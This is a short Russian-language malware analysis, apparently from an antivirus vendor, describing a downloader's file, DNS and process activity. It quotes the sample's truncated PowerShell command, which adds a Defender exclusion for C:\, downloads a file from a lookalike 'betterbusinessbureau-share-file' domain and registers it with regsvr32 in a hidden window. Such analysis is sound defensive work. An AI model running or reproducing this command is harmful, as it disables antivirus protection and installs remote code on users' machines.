Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\.dll
Сетевая активность
UDP
- DNS ASK be########nessbureau-share-file.com
Другое
Запускает на исполнение
- '%WINDIR%\syswow64\timeout.exe' /t 15
- '%WINDIR%\syswow64\regsvr32.exe' /s %TEMP%\.dll
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\';timeout /t 15;$a=$env:tmp+'\.dll';$c=$env:tmp+'\CC3USWBBB.pdf';$x=new-object system.net.webclient;$x.downloadfile('https://betterbusinessbureau-share-file.... (со скрытым окном)
